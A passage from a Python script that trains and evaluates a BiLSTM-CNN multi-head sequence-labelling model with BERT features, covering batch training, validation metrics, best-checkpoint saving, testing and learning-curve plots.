            i_batch_train_char_sentences = to_long_tensor(batch_train_sents[1])
            i_batch_train_pos_sentencens = to_long_tensor(batch_train_sents[2])
            i_batch_train_case_sentences = to_long_tensor(batch_train_sents[3])
            i_batch_train_labels = to_long_tensor(batch_train_labels)

            # bert feature
            i_batch_bert_train_sents = batch_bert_train_sents.tolist()
            i_batch_bert_train_labels = batch_bert_train_labels.tolist()
            i_batch_bert_train_feature = bert_emission.get_bert_feature(
                i_batch_bert_train_sents, i_batch_bert_train_labels, args.device)

            i_batch_train_loss = model(i_batch_train_char_sentences, i_batch_train_word_sentences,
                                       i_batch_train_pos_sentencens, i_batch_train_case_sentences,
                                       i_batch_train_labels, 'train', i_batch_bert_train_feature)

            # backpropagation and clear the grad
            i_batch_train_loss.backward()
            train_loss = train_loss + i_batch_train_loss.cpu().item()
            optimizer.step()
            optimizer.zero_grad()

            # compute the training time
            if i_batch % 10 == 0 and i_batch != 0:
                print('Ten batches cost time : {}'.format(time.time() - batch_start))
                # print the training infor
                print("Epoch:{}-{}/{}, Loss:{}".format(epoch, i_batch, num_batch, i_batch_train_loss))
                batch_start = time.time()
            # NOTE(review): the loss is logged for every batch here; confirm
            # that this matches the intended logging cadence
            writer.add_scalar("train_loss", i_batch_train_loss.cpu().item(), epoch * num_batch + i_batch)

        ave_loss = train_loss / num_batch  # the average loss of each epoch
        train_ave_loss.append(ave_loss)
        print("Epoch: {} is completed, the average train_loss is: {}, spend: {}".format(epoch, ave_loss, time.time() - train_start))
        print("********************Let us begin the validation of epoch {}***************************".format(epoch))

        # evaluate the model
        valid_true, valid_pre, valid_avg_loss = evaluate(
            valid_sents, valid_labels, bert_valid_sents, bert_valid_labels, args.num_valid, with_loss=True)

        valid_loss_score.append(valid_avg_loss)
        each_epoch_valid_f1 = lc_cal_f1(valid_true, valid_pre)
        valid_f1_score.append(each_epoch_valid_f1)
        each_epoch_valid_acc = lc_cal_acc(true_tags=valid_true, pred_tags=valid_pre)
        valid_acc_score.append(each_epoch_valid_acc)
        print('Validation: Epoch-{}, Val_loss-{}, Val_acc-{}, Val_f1-{}'.format(epoch, valid_avg_loss, each_epoch_valid_acc, each_epoch_valid_f1))

        writer.add_scalar('val-loss', valid_avg_loss, epoch)
        writer.add_scalar('val-f1', each_epoch_valid_f1, epoch)
        writer.add_scalar('val-acc', each_epoch_valid_acc, epoch)

        # keep only the checkpoint with the best validation F1
        if each_epoch_valid_f1 > valid_f1_prev:
            torch.save({'epoch': epoch, 'model_state': model.state_dict(), 'valid_acc': each_epoch_valid_acc,
                        'valid_f1': each_epoch_valid_f1}, checkpoint_path)
            valid_f1_prev = each_epoch_valid_f1

        lr_decay.step(valid_avg_loss)  # when there is no change about loss within patience step , lr will decay

        # Early stopping is currently disabled:
        # if early_stop.judge(epoch, valid_f1_score[-1]):
        #     print("Early stop at epoch {}, with val-f1 score {}".format(epoch, valid_f1_score[-1]))
        #     print('Best performance epoch {}, with best val-f1 score {}'.format(early_stop.best_epoch, early_stop.best_val))
        #     break

    writer.close()  # flush the pending tensorboard events

    print("**********************************************\n"
          "********     The training is over.    ********\n"
          "**********************************************")

    test_checkpoint = torch.load(checkpoint_path, map_location='cpu')
    # parser the model params
    test_valid_f1 = test_checkpoint['valid_f1']
    test_valid_acc = test_checkpoint['valid_acc']
    trained_model_dict = test_checkpoint['model_state']
    # get the model param names
    test_model_state_dict = model.state_dict()
    # get the params interacting between model_state_dict and pretrained_model_dict
    selected_model_state = {k: v for k, v in trained_model_dict.items() if k in test_model_state_dict}
    test_model_state_dict.update(selected_model_state)
    # load the params into model
    model.load_state_dict(test_model_state_dict)
    # show the details about loaded model
    print('Load the best trained model, epoch:', test_checkpoint['epoch'], 'valid_acc:', test_checkpoint['valid_acc'], 'valid_f1:', test_checkpoint['valid_f1'])
    model.to(args.device)

    # evaluate the model on the test split; the helper feeds the labels of the
    # current test batch to the model (never a left-over validation batch)
    test_true, test_pre, _ = evaluate(
        test_sents, test_labels, bert_test_sents, bert_test_labels, args.num_test, with_loss=False)

    print('Test: test_acc-{}, test_f1-{}'.format(lc_cal_acc(true_tags=test_true, pred_tags=test_pre), lc_cal_f1(test_true, test_pre)))

    # then, we will show the training and validation processing by figure.
    # set the plot style from seaborn
    sns.set(style='darkgrid')
    # increase the plot size(line width) and figure size
    sns.set(font_scale=1.5)
    plt.rcParams['figure.figsize'] = [12, 6]
    # one x value per recorded epoch, so the curves always match the x-axis
    x_label = np.arange(0, len(train_ave_loss))

    # plot the learning curve. the params are :values, color, line-title
    line1, = plt.plot(x_label, train_ave_loss, color='b', label='train_average_loss')  # epoch as the period
    line2, = plt.plot(x_label, valid_loss_score, color='m', label='valid_average_loss')
    line3, = plt.plot(x_label, valid_acc_score, color='r', label='valid_acc_score')
    line4, = plt.plot(x_label, valid_f1_score, color='g', label='valid_f1_score')

    # now we label the plot
    plt.title('Learning curve')
    plt.xlabel('Epoch')
    plt.ylabel('TrainLoss/ValLoss/ValAcc/ValF1')
    plt.legend(handles=[line1, line2, line3, line4], labels=['train_average_loss', 'valid_average_loss', 'valid_acc_score', 'valid_f1_score'], loc='best')
    plt.savefig('MB_BiLSTM_CNN_MultiHead_all.jpg')
    plt.show()